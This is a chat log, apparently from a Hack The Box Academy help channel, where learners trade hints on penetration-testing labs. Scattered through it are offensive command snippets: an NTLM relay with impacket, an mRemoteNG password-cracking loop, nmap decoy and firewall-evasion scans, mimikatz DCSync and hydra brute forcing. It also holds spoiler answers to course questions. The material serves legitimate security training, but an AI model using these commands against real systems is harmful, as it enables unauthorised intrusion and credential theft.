#modules

I did have 13. 9 Tier 3, and 4 Tier 4

I still have 13 modules
2x Tier 0
9x Tier III
1x Tier IV

and Attacking Common Applications two sections

it was in login in brute force it is the first question under service authentication Brute forcing. Here is the whole question: Using what you learned in this section, try to brute force the SSH login of the user "b.gates" in the target server shown above. Then try to SSH into the server. You should find a flag in the home dir. What is the content of the flag? I was able to login into the SSH server I just cannot find the flag, so I am assuming I have to do something to get to the home.dir but I do not know what

Let me guess, the 2 thick client chapters?

Yes 🤪

The update to the thick client chapter made things a lot clearer 🙂

I tried yesterday but I am too stupid. I did not make it

Which bit did you get stuck on?

I didn't write it down because it didn't work at all.

I had a hell of a time with the Exploiting Web Vulnerabilities in Thick_client Apps part... I never did get it to work right

I would have to try it again, but I need enough motivation for that. 🙈

You have found the password and are logged in?
Then list the directory ls

did ls /home but that got me b.gates and m.gates not the flag, which is why I know I am doing something not correct to get to the home dir

Normally you log in to the home directory.

You can check this with pwd

when I did that I got /home/b.gates, so i did ls /home/b.gates and got flag.txt and rockyou-10.txt but again no flag for this question. I just do not understand this craazy question

flag.txt does contain the flag you are looking for

cat flag.txt

OMG thank you

some flags are not wrapped in HTB{flag}

but rather just the value

I thought my head was going to explode with this question.

I really appreciate the assistance

is it not possible to install xfreerdp on Parrot OS (HTB version)?

┌──[f0rk@parrot]─[~]
└──╼ $ sudo apt-get install freerdp-x11
Reading package lists... Done
Building dependency tree... Done
Reading state information... Done
Package freerdp-x11 is not available, but is referred to by another package.
This may mean that the package is missing, has been obsoleted, or
is only available from another source
However the following packages replace it:
  freerdp2-x11

E: Package 'freerdp-x11' has no installation candidate
┌──[f0rk@parrot]─[~]
└──╼ $ sudo apt-get install freerdp2-x11
Reading package lists... Done
Building dependency tree... Done
Reading state information... Done
Some packages could not be installed. This may mean that you have
requested an impossible situation or if you are using the unstable
distribution that some required packages have not yet been created
or been moved out of Incoming.
The following information may help to resolve the situation:

The following packages have unmet dependencies:
 freerdp2-x11 : Depends: libfreerdp-client2-2 (= 2.3.0+dfsg1-2+deb11u1) but 2.10.0+dfsg1-1~bpo11+1 is to be installed

did you try installing that dependency? sudo apt install libfreerdp-client2-2

I did

Try it like so

sudo apt-get install aptitude

sudo aptitude install freerdp2-x11

https://www.reddit.com/r/debian/comments/vcpcpe/cant_install_freerdp_neither_freerdp2x11/

https://packages.debian.org/bullseye/amd64/libfreerdp-client2-2/download

This is what I am looking at atm

sudo aptitude install freerdp2-x11
The following NEW packages will be installed:
  freerdp2-x11{b} 
0 packages upgraded, 1 newly installed, 0 to remove and 0 not upgraded.
Need to get 104 kB of archives. After unpacking 837 kB will be used.
The following packages have unmet dependencies:
 freerdp2-x11 : Depends: libfreerdp-client2-2 (= 2.3.0+dfsg1-2+deb11u1) but 2.10.0+dfsg1-1~bpo11+1 is installed
The following actions will resolve these dependencies:

     Keep the following packages at their current version:
1)     freerdp2-x11 [Not Installed]                       



Accept this solution? [Y/n/q/?] Y
No packages will be installed, upgraded, or removed.
0 packages upgraded, 0 newly installed, 0 to remove and 0 not upgraded.
Need to get 0 B of archives. After unpacking 0 B will be used.
Scanning application launchers           
Removing duplicate launchers or broken launchers
Launchers are updated

Strange is, you don't see a newly installed package

LOL ```bash
sudo dpkg -i libfreerdp-client2-2_2.3.0+dfsg1-2+deb11u1_amd64.deb
dpkg: warning: downgrading libfreerdp-client2-2:amd64 from 2.10.0+dfsg1-1~bpo11+1 to 2.3.0+dfsg1-2+deb11u1
(Reading database ... 450654 files and directories currently installed.)
Preparing to unpack libfreerdp-client2-2_2.3.0+dfsg1-2+deb11u1_amd64.deb ...
Unpacking libfreerdp-client2-2:amd64 (2.3.0+dfsg1-2+deb11u1) over (2.10.0+dfsg1-1~bpo11+1) ...
dpkg: dependency problems prevent configuration of libfreerdp-client2-2:amd64:
libfreerdp-client2-2:amd64 depends on libfreerdp2-2 (= 2.3.0+dfsg1-2+deb11u1); however:
Version of libfreerdp2-2:amd64 on system is 2.10.0+dfsg1-1~bpo11+1.

dpkg: error processing package libfreerdp-client2-2:amd64 (--install):
dependency problems - leaving unconfigured
Processing triggers for libc-bin (2.31-13+deb11u5) ...
Errors were encountered while processing:
libfreerdp-client2-2:amd64

I got tired on insatlling tools on Parrot and went back to Kali...

you should say no

got it ; )

I did bash chmod +x *.deb sudo apt install *.deb

First day using Parrot OS 👀 😂 Got already a good expierence

i'm stuck here
Password Attack Lab -Medium
Examine the second target and submit the contents of flag.txt in /root/ as the answer.

i'm in jason user , don't know further , for dennis and root access

Thanks for the help @acoustic owl @tidal mango , I appreciate it.

for windows priv esc pillaging has anyone gotten this script to work to crack the password. I have the password from other means, just playing with it to figure out what its doing and trying to understand why its not working.

for password in $(cat /usr/share/wordlists/fasttrack.txt);do echo $password; python3 mremoteng_decrypt.py -s "EBHmUA3DqM3sHushZtOyanmMowr/M/hd8KnC3rUJfYrJmwSj+uGSQWvUWZEQt6wTkUqthXrf2n8AR477ecJi5Y0E/kiakA==" -p $password 2>/dev/null;done 

Of course this is the example one, I even added the password to the wordlist and it still didn't find it.

You are on the system with ||SSH?||

yeah

check local ports : )

||a mysql server is open but i cannot access it with the user jason I get ERROR 1045 (28000): Access denied for user 'jason'@'localhost' ||

pm me with your command

hey

hello, I am in "Find the password for the ldapadmin account somewhere on the system" in winPrivEsc assessment one. Does anyone have a hint, ive been looking for quite a while now

how do i find the port of a url?

Still stuck?
I can change that. Pm me.

https://academy.hackthebox.com/module/details/35

I'm going insane with the Broken Authentication Skills Assessment, any help would be appreciated.. I have the cookie I need from the user I can log in with but when I 'use' that cookie I get User cannot have requested role... I've tried it in repeater as well as dev tools, don't know where to go from here

dude can somebody join a vc with me i need help

Dude

Are you doing modules or still trying to help your friend

Because if you're trying to help your friend then ask for help in #community-content and you'll get usually better answers

i came for the hax; i stayed for @fathom pendant

You haxed my heart bbqgrill

does anybody have a birthday wordlist from dates like 01012000-12122010

so you're looking to generate something 01012000 >> 12312000 and repeat until 12122010 (i'm being like this on purpose)

either way; entertaining your off-topic discussion you should REALLY move this to #1024429874246590575 and post your questions there

as they are WHOLLY unrelated to academy content

dm if still working on it

lul

Seems like I hit a nerve

😂

#583613644294717453 would be a nice place to post private chats

yeah not sure why you're airing your saltiness here

¯_(ツ)_/¯

Just think its ridiculous, if you ask for help and then tilt because I don't just give you the full solution

again that's airing saltiness that's not really necessary to do here

okk

@cobalt nebula

can we help you?

I am new to this platform

@fathom pendant

Still not asking a question

this channel is about asking questions regarding the modules found on https://academy.hackthebox.com

Well I m new to everything don't know from where to start things

if you're having questions regarding https://app.hackthebox.com please refer to #rules and #welcome and you'll have access to more parts of the server

https://www.hackthebox.com/blog/learn-to-hack-beginners-bible

shall i go for this

the https://academy.hackthebox.com/ has many fundamental (tier 0) courses that you can look at and learn from to learn without needing to spend money

Sry I was meant for people to know what the get themselves into when the try to help this person. I just move it somewhere to the image channel

all active boxes on the main app site are free

thank you will sure go for it right now

You can start with the "starting-point" stuff

It gives a good intro to how boxes work and different concepts

where should i filter this @manic magnet

sry I misstyped

wait I send you the link in a dm

thank you

Thanks

@fathom pendant thank you for you as well for the resources

Beginnings in cybersecurity are not at all easy, especially when you are self-taught.

yep

self taught myself and i don't know shit

Even as a person that is at university for this stuff I feel like I know shit 😂

Incorrect information in web requests module

Anyone working on the new windows module?

Module: Windows Attacks & Defense -- Kerberroasting

First task runs into issues with the given parrot vm

Attacking common services - hard lab has been solved!
If anyone needs hints they can read this:
https://forum.hackthebox.com/t/attacking-common-services-hard/259742/30

Additionally if anyone gets stuck on this module, you can dm me, I will be more than happy to help 🙂

Can I DM someone for DNS footprinting question 4? What is the FQDN of the host where the last octet ends with "x.x.x.203"? I have performed two zone transfers and found a bunch of domain names. All attempts to brute force a subdomain from any of the domains I have found have returned no additional results. Could I have a hint as to where to look for the answer?

You can dm me

Subdomains of subdomains

subdomainception

that's going to be potentially difficult to solve but there's a few things you can try

the core issue there is that your CPU is being picked up as "generic" by POCL

this happens a lot in VMs

and when we receive "generic" as a target, we can't actually complete kernel compilation at this time

pwnbox and hashcat are having issues on the eu-servers rn afaik; the US ones work alright though

note this was info provided by Jared at some point when it first started occurring

Is there a limitation of GenericAll on Domain Admins? In one of the labs I first added a user to a group that has Generic All over Domain Admins and then wanted to add the user to Domain Admins. But that fails due to lack of privs.

Can confirm, not working here in the EU.

any chance you know of anyone on the HTB side working to fix that? I may be of some use

the US ones

US 1 and 2 seem to be working from what i've been told

• note I use my own VM running parrotOS so it's not an issue for parrotOS just those instances for some weird reason

probably older gen or potentially intel CPUs

the problem is that the version of POCL installed doesnt have the specific CPU as a mapped target device

so it cant supply a good compilation target for hashcat

Ill just work with my cpu for now

🍪

thanks for the answers

again it's something weird on the EU docker instances @west canopy hashcat works fine on the US instances for academy yeah?

doesnt seem like its anything too weird, just a CPU/runtime miss-match

this happens fairly often

yeah

how would one fix that?

I don't think WE the end-users can fix it

yeah, i know

i mean how from a admin pov would you fix it

Ah ok sry

That would be interesting true

well, in theory you could change out the POCL runtime with one that supports that hardware better

really that's all that's needed

POCL supports many, but not every device and sometimes all thats needed is an update to a more recent version for a device to be better supported

hehe

lol, don't trust chatgpt for hashcat stuff

we get enough of that to know its more wrong than right

Why not, its not a uncommon issue you mentioned

yes but even in the response you got it's not really giving you relevant asnwers...

we dont have a list of supported CPUs on our website

and OpenCL drivers for GPU arent going to help your CPU lol

it gave good looking answers, but not correct ones

Ok 🙂

but yeah, this is just a matter of making sure the computing device and runtime agree with eachother

i've not seen many 3rd gen Epycs w/ POCL under hashcat

So since hashcat supports the 4090 now, did you see kevnin mittnicks 24x 4090 setup?

hard to say if that specific model works with POCL or what version

haha yeah i saw it

i cant say i'd do Exactly what he did

but its not terrible, its off the shelf fluidworks hardware

Pretty sure hes just goofing around

more money than sense, as they say

Anyway folks, if you run into issues with hashcat in the Windows Attacks & Defense module, atleast for now, avoid the pwnbox

on eu

Yo can someone that is much smarter than I am help me out with the VPS hardening section?
https://academy.hackthebox.com/module/87/section/906

but what is your actual question; what is the module and section name? I don't feel like opening the link

"help with this" but what are you actually having trouble with

Yeah thats fair, basically If I am editing these text files correctly for the SSH config settings.

These bits.

I thought I edited the docs right, but it breaks SSH for some reason

not sure really haven't done that module or at least it doesn't look familiar to me ¯_(ツ)_/¯

but that definitely clarifies what your actual question is

No worries, I'm just going to re-install the VM and try again lol

breaking things is not fun xD

What module is that? it looks cool

Maybe I posted in the wrong channel but its this path

ah linux fundamentals

I haven't bothered with that

I completed that one, dont think it was to difficult

ahh its been updated

nvm

question didnt ring a bell

Yeah the general knowledge stuff isn't terrible, just been trying to fix the SSH config issue I am having. But I might have broke the config, idk I am just starting from scratch since I am not too deep

Sounds like a solid plan my friend

big shoutout to @rustic sage for helping me with the footprinting: DNS module. I would have been stuck a lot longer if not for his help

much appreciated 👍

I am glad I could help. Keep helping others 🙂
Cheers.

last 5 parts of linux fundamentls 😴

Yep we're still working on it

In the Active Directory LDAP module LDAP Anonymous Bind section -- The last question is "What OU is the user Kevin Gregory part of (one word, case sensitive, i.e. Marketing)? ". I cannot figure out how to get OU information back with an anonymous bind. Can anyone help me out?

any tips on Identify the username of the user that has a position of 736373 through SQLi. (Web Service and API attacks module).

are you locked to that type of hardware for the underlying instances?

because that may be the fastest/easiest way to fix it

Mind if I DM you?

sure

I wish to grab the first 100 packets with tcpdump which switch will you use ?

I already tried using -c (count) 100

anyone good in java?

http://dontasktoask.com

also #rules #welcome

i'm not lazy i have a problem

but yes i do need help with a problem

I'm a little stuck on the "PIVOTING, TUNNELING, AND PORT FORWARDING" Skills Assessment, final question. ||I think I've found the DC on 172.16.10.5 but it's not letting me RDP into it.|| Can I have some tips what to do next?

feel free to dm

head -100?

I'm going to try tomorrow

but i got use it with other switches

-nnvXX

After your tcpdump command you need to pipe the output to head which will grab it's first 100 lines.

is this specific to tcpdump?

Yep

I was trying with -c but it didn't work

-nnvXXc 100 Like this

but didn't work

this might help:

I am not on my machine or I would experiment with it

Ty, but like i said I already tried those switches

you have a problem with reading: is your problem related to an academy module?

the website i linked is about asking your question better instead of "anyone good in java" ask your question more directly

the funny part is that anyone good in java is literally the example used

like that site applies to asking questions in general, but it is most applicable to neo here than it has been to anyone else.

Hey, is anyone online and can help with password attacks module hard lab?

https://dontasktoask.com

Well, I’m at skill assessment hard lab trying to crack Johanna’s password. Tried with password.list and mut file with no success and moved from hydra to crowbar to crackmapexec.. am I on the right path?

what service are you trying to crack it on

hi I am trying to do the if-else statement challenge in intro to bash module in academy and I am getting "bad subsitution" errors and other errors and if someone could help me out that would be great. Here is my code:

#!/bin/bash

var="8dm7KsjU28B7v621Jls"
value="ERmFRMVZ0U2paTlJYTkxDZz09Cg"

in_var=true

for i in { 1..40 }
do
        var=$(echo $var | base64)
        
        if  ( $i in $var ) 
        then
            $in_var=true
        else
            $in_var=false
        fi
done

if $in_var
then
    for i in $var:
    do
        echo $i >> var.txt
    done
    tail -c 20 var.txt
fi

I don't get it. Should I use another for-loop? I need to check if all variables in value are in var. Then if they are I need to print last 20 characters of var if var is greater then 113450 characters.

What am I doing wrong?

can someone help me out?

I know this question is asked a lot, I'm working on the DNS section of the footprinting module, I'm trying to enumerate the subdomains of the subdomains but I'm getting NS record query failed results and I'm not sure how to proceed, anyone available to DM?

I am trying to do privilege escalation, I am running the http server in the same directory as the linPeas.sh and I am calling it in the victim shell, but i am getting connection timed out, I have tried the tun0 and another ipaddress, but I am getting the same thing for both, so what Ip address should I use?

hi, are there any one accessed as root in busque machine ?

Dnsenum with the right list will get it for you if you give it the right x.inlanefreight.htb subdomain

Read #rules and #welcome

I've been trying with a few lists, I keep getting NS record query failed: Refused, should I be changing the nameserver used with Dnsenum to a different IP than provided?

No

Also if you have inlanefreight.htb in your /etc/hosts file, you're not going to get it

I didn't, so essentially I should just go through all the subdomains that I find from the zone transfer of the domain?

I'm dumb found it thanks 🫡

no one wants to give me a hint with my code?

This is not a general chat, read #rules and #welcome

This is normal you're going to use the user/pass with sqlplus as shown in the module

I was able to connect to the http server for the privilege escalation, but when I download the files, i am getting Read error connection reset by peer, how do I fix that?

dnsenum on all of the subdomains (x.inlanefreight.htb) with a fierce list

In the module for SMB on common attack services stuff, it talks about forced authentication after getting the password from responder

Then it uses Forced Authentication Attacks
@htb[/htb]$ impacket-ntlmrelayx --no-http-server -smb2support -t 10.10.110.146
but I am not understand where the authetnication to dumb hashes is coming from here? I don't see hash being passed or password being used

Hello guys, my mom phone was hacked by remote control i guess? What should i do guys?

Stuck in the skills assessment of os command injection module

Don't know where to inject the command

Anyone here done with that module ?

Hi fellows, can someone help with Using Crackmapexec module assessment, I have pwned the SQL server and got couple of sets of credentials, but I cant figure out how to continue with the DEV server, any nudge will be appreciated, thanks 😌

Take a look at the database

I need help, my friends account got hacked by another ‘friend’, i only have the hackers number. It happened over Facebook so if someone can tell me what do to, to get it back or to help me I would be really thankful. Facebook support doesn’t help. It happen less than 72h ago. Please tag me, like @ me to get my attention if i don’t respond.

We cannot help you

Hi Guys, im working on the Linux Buffer Overflow x 86 module and have i question wehn we compile the c program

gcc bow.c -o bow32 -fno-stack-protector -z execstack -m32

Oh no thats sad

-o = output file, -fno-stack-protector = disable stack protection -z = for build a executable file and -m32 for 32 bit version

is that correct?

i need help for LOGIN BRUTE FORCING, Service login, ive generated custom password list using ccup and most information i can find abt harry online but i still cant get it to work, looking to get a nudge

have you checked the hint?

oh oops LOL

tried doing it without the hint

lemme try agn

Wow people are really terrible at asking good questions on this discord. I guess maybe we should have some sort of question template or something

though I wonder if it would ever actually get used

Well just gave it another shot at hydra and got an password that’s not working..

Morning folks

Still stuck?
I can help you out 🙂

Yep
Let’s go dm

Hey have anyone had contact with such an error in Eyewitness

[] Selenium not found.
[] Please run the script in the setup directory!

???

Fixed nvm

#Module: Windows Privilege Escalation
#Section: Communication with Processes
The "Named Pipes" portion mentions Cobalt Strike. I don't see any modules for it on academy, and it looks like you need a license to use it. Is this something I'm going to need for the CPTS? Where/how can I get practice with it?

in the nmap module it is said that the decoys used with the -D RND:5 option must remain alive. what does that mean?

I understand this as that the IP's you use as decoys need to be valid (I guess for example they correspond to real ip's in the network)

Also this can mean that the connection needs to be kept alive. Such that the target does not think it is syn flooded

You can read more about it here:
https://www.ionos.com/digitalguide/server/security/syn-flood/

I thought so too. it still scrutches my brain a bit. like what if RNG IP is VALID and someone is using it... wouldn't that mean we are essentially using resources that belong to someone else?

let alone masking (potentially) criminal behavior?

I mean pulling soneone that isn't involved in the contract into our test

I mean depends on the security mechanism that they have in place. I mean you can just use internal ip's. I guess they more refere to my second explaination

Help

Like don't use "new" syn's but rather keep the connection alive meaning continuing the already established connection

what do you need help with ?

I will dm you with more information on that topic if you want

No it's ok... it's just an intrasting legal question

This is from the nmap website:

Note that the hosts you use as decoys should be up or you might accidentally SYN flood your targets. Also it will be pretty easy to determine which host is scanning if only one is actually up on the network. You might want to use IP addresses instead of names (so the decoy networks don't see you in their nameserver logs). Right now random IP address generation is only supported with IPv4

Don't know about CPTS part but as part of my CRTO subscription I have access to a lab that has a licensed copy of cobalt strike. I think you need to buy CRTO subscription and then another subscription to access the labs, it will still be cheaper compared to buying cobalt strike.

No, a license from Cobalt Strike is not required for CPTS

@acoustic owl But do I need to be familiar with using Cobalt Strike on the CPTS exam?

nope

If I wish to start a capture without hostname resolution, verbose output, showing contents in ASCII and hex, and grab the first 100 packets; what are the switches used? please answer in the order the switches are asked for in the question.

||-nnvXXc 100||

hello guys i want to ask how to hack into a webserver that is outside my network using metasploit

elaborate

I don't know what I'm doing wrong

Do you get an error ?

yup

Can you dm me the error ?

Metasploit is explained here
https://academy.hackthebox.com/module/details/39

but thats the error wym?

Didn't you just say that you get an error, when I asked ?

anyone able to give me a nudge on the last pivot on the Tunneling, Pivoting module?

it's just a question from the hackthebox academy module

For this question?
Submit the contents of C:\Flag.txt located on the Domain Controller.

Ah sry. I thought you asked it in general. Please specify next time that you have problem with a question on a module xD

my bad lmao

I haven't done the module yet but maybe specify them in singles like ||-nn -v -XX -c 100|| ?

nope, error

I will dm you with another thing I found

yeah thats the one... I know the IP is .45 and i got the creds for mlefay and vfrank... but rdp and ssh to .45 aint aorking

am i missing something?

Take a look at the network drives

hmmm, i see

academy is down and out. TLS error.

What is a science fair topic that would get me a gold medal?

wrong channel

Oops sorry

working again (at least for me)

Hi I just wanted to follow up since it seems like no one wants to help me with my BASH code for the intro to BASH module.

hi I am trying to do the if-else statement challenge in intro to bash module in academy and I am getting "bad subsitution" errors and other errors and if someone could help me out that would be great. Here is my code:

#!/bin/bash

var="8dm7KsjU28B7v621Jls"
value="ERmFRMVZ0U2paTlJYTkxDZz09Cg"

in_var=true

for i in { 1..40 }
do
        var=$(echo $var | base64)
        
        if  ( $i in $var ) 
        then
            $in_var=true
        else
            $in_var=false
        fi
done

if $in_var
then
    for i in $var:
    do
        echo $i >> var.txt
    done
    tail -c 20 var.txt
fi

I don't get it. Should I use another for-loop? I need to check if all variables in value are in var. Then if they are I need to print last 20 characters of var if var is greater then 113450 characters.

What am I doing wrong?

Need some help, don't know why I can't wrap my head around this.. I need to get a file onto a computer that I have used chisel to proxy to. My attack computer is chisel'd thru a 10.129.x.x host to a 172.16.x.x host. the 10.129.x.x host obviously has a 172.16.x.x interface and I'm able to RDP to the third device. How do I get a file thru the chain to the third device in the chain?

ChatGPT might be helpful, have you tried it?

hey guys, i'm having difficulty with the nmap service enumeration medium lab in regards to grabbing the DNS version

i'm aware that port udp port 53 is open, however whenever i attempt to connect with nc whether it's from source port 53 or not onto udp port 53 it just doesn't display anything

any tips?

add verbose

wat

doesnt that just show the ports when they become available

oh

does anyone finished Coder machine ?

@fiery berry i get the same result as my normal nmap scan

use NSE

it gives me NLnet Labs NSD

can i get the service with using exclusively nmap?

or is nc involved

https://nmap.org/book/man-nse.html

sorry haven't seen that is for the medium lab

yeah payload i've ran a few scripts from NSE

let me try again

I didn't use any nse though

cant remember if i specified to run it on udp as opposed to tcp

just a scan with the right arguments will do as well

this is painful

i can't get it at all

hmm

what am i missing

@rustic sage dm

Did you solve it without NSE scripts

yes

Can I send you a DM?

sure

Can someone please help me with the Module: File Inclusion. Section: Log Poisoning. Question: "Use any of the techniques covered in this section to gain RCE, then submit the output of the following command: pwd". My issue is that I receive a 500 internal service error when trying to replace the user agent value with a simple php webshell. Can someone please assist?

Has anyone finished the Windows Attacks & Defense module?
I'm stuck in the PKI - ESC1 section on the second question.

" After performing the ESC1 attack, connect to PKI (172.16.18.15) as 'htb-student:HTB_@cademy_stdnt!' and look at the logs. On what date was the very first certificate requested and issued? "

Actually I think it should be quite simple.
But I am missing something. My answer is not accepted.

|| Both IDs 4668 and 4667 have the first entry on 12/19/2022. ||
But this answer is not accepted

Has anyone completed the hackthebox academy file upload skill assessment and can hmu with a hint?
I'm 3 hours on this and haven't figured it out

There are double quotes in the log. You will break the log if you use double quotes for your payload.

anyone thats done the file upload attacks assessment able to assist? i think i was able to get my payload uploaded but unable to to get the file location. and im not sure where i can put an xxe payload thatll work to get the php code

Anyone assist with this?

#Module: Windows Privilege Escalation
#Section: Communication with Processes
Named Pipes Attack Examples
Module has been great so far. I'm under the impression that I should be able to accomplish these escalations manually. Though the only link provided is to a metasploit module. Is this sufficient, or should I learn to do this manually? If I should do it manually, where/how can I learn about named pipe usage in windows; google searches offer decent examples, but not much feed back into errors/specific use cases.

SUS.com

<@&861185840277487616>

?

q pasa

what's up

get out of here with that.

Damnit I missed it

Can I dm you?

sure

well i was able to get the flag after a bit of cheesing but i still dont know how to get the xxe payload to work on the assessment with it being reflected back the way that it is

would anyone be able to explain this to me since it wasnt a huge part of the module

Hi Guys

So i am doing module Public Exploits

I have done a metasploit search for the wordpress plugin and found

auxiliary/scanner/http/wp_simple_backup_file_read normal No WordPress Simple Backup File Read Vulnerability

I am guessing this is the correct one.

I set the rhost ok to the ip address of the web server ok

When i go to set the LHOST to tune0

I get the following error

Unknown datastore option: LHOST. Did you mean VHOST?

If anyone can help with this one would really be gratful.

Many Thanks

Kapz

I'm in the Active Directory Enumeration and Attacks module and getting an error when trying to install secretsdump.py. It gives the error of "not found". I'm using $ git clone URL of repository and getting this fatal repository error. Has anyone else seen that?

try impacket-secretsdump

Not tune0, tun0

But also this exploit does not have an LHOST option

Thank you! That was very helpful.

type options and see if lhost is really an option, in case of most web exploits a reverse shell is not necessary because you will get a web shell

Can i dm you?

This exploit is a file read exploit, no shell

Thanks for pointing that out, I hope it's resolved on their end.

It's just they probably wanted to set all options and didnt execute or run it

Sure

Do anybody here have experience in extracting files with volatility3? Command I tried did not work, An example: python3 vol.py -f image-file windows.dumpfiles --pid 216 -D /tmp/ ,also tried ..... windows.dumpfiles -o <memory address> -r filename-to-dump.pdf.lnk -D /tmp/

What module is this for?

forensics

wrong place?

Is it a module called forensics?

If not then read #rules and #welcome for how to access other parts of the server and be able to post your question in the relevant place

If you are having issues with the file inclusion module, feel free to send me a message.

Bees nuts

I'm in the Active Directory Enumeration and Attacks module in the DCSync section and could use some guidance. I realize that I need to set up a tunnel to the Domain Controller, but everything I've tried thus far has failed. Any hints on this?

Ok the final nmap practice is beating me... I tried stealth scan, simple scan, UDP scan, and now I'm trying ACK scan which is taking FOREVER. I think I just didn't understand the question and situation. anyone care to elaborate and explain what is going on there?

The nmap hard assessment?

yes

Follow the IDS/IPS evasion section

Ok but why? how could I have guessed that?

Because up until this one you haven't needed to really put that section to use

And it was introduced prior to the assessments

that's not what...

ok

If you're asking about the port try doing a scan with --source-port 53 iirc that gets you the mystery one

I mean the labs easy to hard in the nmap module are all about IDS/IPS Evasion.

Yes

But not really

The easy/med do not require any evade techniques

The hard is where it pops more

Yeah, I know but what I mean is that they are all in the subsection of IDS/IPS Evasion:

Technically under subsection "bypass security measures"

yeah ok xD

But I'm saying this as someone who's sanity checked this module many times

Also according to Jared the lineup is intentional

Which isn't uncommon in modules

Well I tried --source-port 53 with -sT and -sA. I'm not banned from the service... I get ssh and http. both aren't the answers. I have no idea.

wait.. one last try

The ban is a few minutes

I've given you the info on how to get what you're looking for

I honestly have no idea... i need the reasoning I feel like I'm shooting in the dark.

https://academy.hackthebox.com/module/19/section/106

There is some more stuff on this section of the module that you didn't mention that you tried. Try reading it again. Maybe you will find some more stuff to use 😉

Just... Read the section it tells you EVERYTHING

can't say much more without spoiling

I didn't try choosing dns server, as it seems there isn't one... I didn't try designating an interface.

I'm using mimikatz as described in this section and I'm getting an error of ERROR kuhl_m_lsadump_dcsync ; GetNCChanges: 0x000020f7 (8439) instead of giving me the hashes as described. Any idea why I'm getting this strange error?

Remember that you can also chain the evasion techniques

Just try everything that gives a positive output in the examples

That error is for not running Mimikatz with elevated privileges. Are you running it from an elevated command prompt?

Yes, thank you for letting me know. I'll try it without elevated privileges.

Nope, still getting that same error even running it with standard creds.

Then you need to get Admin creds somehow. Or a user that is able to replicate directory changes.

Got it! Thank you!

Just for my understanding: If I port forward through ssh (via the host 10.129.10.20) say my local port 1234 to 22 to the host 172.39.10.2 then the response, 172.39.10.2 sends back via 10.129.10.20 is forwarded back to me again? ( I am doing the module with port forwarding and tunneling)

Ok I just need an answer of how to get the thing... I am doing -sA --source-port 53 and the scan is taking FOREVER because of the service scan.

the answer is in the section

that's not helpful.

go through the whole part of the IDS sub-section "DNS Proxying"

I don't see a DNS to proxy from...

that

READ the section

read what it's telling you to do under that part

that will get you the answers

Yea I don't see it...

Look at the examples given that are below that section (the Scan parts)

What section are you on?

can I dm you ?

are you talking about this sudo nmap 10.129.2.28 -p50000 -sS -Pn -n --disable-arp-ping --packet-trace --source-port 53 ?

yes

hi guys I keep coming here to get help with my code. I get a few suggestions. If I could DM someone to get help figuring out the answer that would be great. Please don't give me the answer tho I want to learn and I only learn if I figure it out. This is for Intro to BASH module.

Here is my code:

#!/bin/bash

var="8dm7KsjU28B7v621Jls"
value="ERmFRMVZ0U2paTlJYTkxDZz09Cg"

in_var=true

for i in { 1..40 }
do
        var=$(echo $var | base64)
        
        if  ( $i in $var ) 
        then
            $in_var=true
        else
            $in_var=false
        fi
done

if $in_var
then
    for i in $var:
    do
        echo $i >> var.txt
    done
    tail -c 20 var.txt
fi

Yes, you can DM me.

As I said... I am currently doing a -sA --source-port 53 and the scan is still ongoing...

remove the specified port and obviously change the IP to your target

cancel that scan

Ack scans take forever to begin with

sudo nmap -sA --source-port 53 -p- -sV -n --disable-arp-ping -Pn 10.129.2.47 this is what I am runing.

AAANNDDD target just died.

X_X

hey, dm

also add -p-

It's there.

I got the desired results I think...

with a -sS scan

I asked the same thing multiple times and no one wants to help me. Am I just not liked here? What am I doing wrong to the community? It's like I'm a ghost or something.

lmao

how can i help you?

Someone just send me message with the pivot module and I missclicked ignore

pls DM me again 😂

I asked my question above. I am doing these instructions:

Create an "If-Else" condition in the "For"-Loop that checks if the variable named "var" contains the contents of the variable named "value". Additionally, the variable "var" must contain more than 113,450 characters. If these conditions are met, the script must then print the last 20 characters of the variable "var". Submit these last 20 characters as the answer. 

Here is my code. I would like someone to help me figure out the answer. If you could DM me that would be great:

#!/bin/bash

var="8dm7KsjU28B7v621Jls"
value="ERmFRMVZ0U2paTlJYTkxDZz09Cg"

in_var=true

for i in { 1..40 }
do
        var=$(echo $var | base64)
        
        if  ( $i in $var ) 
        then
            $in_var=true
        else
            $in_var=false
        fi
done

if $in_var
then
    for i in $var:
    do
        echo $i >> var.txt
    done
    tail -c 20 var.txt
fi

thank you

or if someone could help me here that works too

ok now why did the -sS work and the -sA not?

but don't give me answer help me figure it out

no idea sorry queue

dm

Will do thanks.

Because of how they work, syn and ack are two different types of packets

i figured that much... am looking for a more indepth explanation tho thanks

explanation here

I appriciate the effort, however I understand how a handshake works, still doesn't explain why the dif scans show diff results.

Ack is basically the third step of the handshake so it doesn't necessarily expect a response back

Where syn is the start

So with syn (and source-port 53) you're saying "Hi do you know about x machine?"
Syn-Ack "sure here is the info"
Ack "thank you"

Hello I’m stuck on the last question of Buffer Overflow on Linux module skills assessment. Not sure why I’m not getting reverse shell I think I did it correctly ….

Can someone help?

Does anyone know why it is ok to use 0.0.0.0 here as a destination ip?

0.0.0.0 means all interfaces

So it can listen through any host/subnet

Which is why when you start http.server through python it starts the service on 0.0.0.0 {specified port, 8000 default}

yeah but I mean its not listening. Its sending it to 0.0.0.0 isn't it ?

Technically yes and no in order for it to send it also needs to listen, no?

selling unturned cheats

But in short: 0.0.0.0 address just signifies any way that the system is accessed

So it's regardless of any VPN connection

It listens on any, but it makes the connection to the specified ip/port.

Don't care didn't ask + not relevant

I am confused 😂

DM me

Hey, I am in the same spot. I think I did it correctly too but can't seem to move forward.

any tips on the wordpress skills assessment? i've done every question and have shell access to the wordpress machine yet i still can't find the flag for this question
Use a vulnerable plugin to download a file containing a flag value via an unauthenticated file download.

Unauthorized file download is the key here

Check the plugins

i've exploited the plugin i just dont have a clue what file it is i need to read

so I've been going through the intro to sql injection fundamentals module, i have to say this module is lacking alot of point on what sql is and what it does and how it works, fortunatley there is alot of resources online if you what better understand sql languages and how sql injection works, but i have to say i wasn't to impressed with the sql module as what it looks like they where trying compress the understanding of sql all the while produce complex sql attacks, i hope HTB puts more work into their modules as has more respect for their topics going forward as ive seen out of this one i believe it needs a complete overhaul

Most modules I have taken are really good

@manic magnet so far everything before the sql intro has been good as well, and i completely understand these modules are only meant to be primers on the topics they cover, but i believe they should very least provide resources within the module to go elsewhere if you want to expand your knowledge on the subject, most of the ones before have done so, though the sql module is completly lacking any quality links

can i have anymore of a hint? im clueless at this point. nevermind got it. was trying to use LFI to read the file..doh

there are gaps here and there in certain modules ... in some cases poorly formulated questions. Which as frustrating as it is, it helps build patience and ability to deduce things. However, other times its just down right absurd.

